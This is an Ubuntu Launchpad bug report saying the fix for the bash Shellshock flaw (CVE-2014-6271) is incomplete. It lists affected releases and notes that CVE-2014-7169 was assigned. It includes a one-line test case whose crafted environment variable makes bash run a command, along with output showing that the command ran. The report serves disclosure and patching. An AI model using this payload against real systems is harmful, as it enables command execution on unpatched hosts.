bash incomplete fix for CVE-2014-6271
Bug #1373781 reported by Robin H. Johnson
This bug affects 21 people
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| bash (Ubuntu) | Fix Released | Undecided | Marc Deslauriers | |
| Lucid | Fix Released | Undecided | Unassigned | |
| Precise | Fix Released | Undecided | Unassigned | |
| Trusty | Fix Released | Undecided | Marc Deslauriers | |
| Utopic | Fix Released | Undecided | Marc Deslauriers | |
Bug Description
The fixes for CVE-2014-6271 do NOT work! Security vuln, but should be public, this is known already.
Ubuntu 14.04 LTS: bash 4.3-7ubuntu1.1
Ubuntu 12.04 LTS: bash 4.2-2ubuntu2.2
Ubuntu 10.04 LTS: bash 4.1-2ubuntu3.1
Testcase:
```
rm -f echo && env -i X='() { (a)=>\' bash -c 'echo id'; cat echo
```
expected output:
```
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
id
```
actual output:
```
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
uid=0(root) gid=0(root) groups=0(root)
```
http://seclists.org/oss-sec/2014/q3/685
CVE-2014-7169 is assigned for the failed patch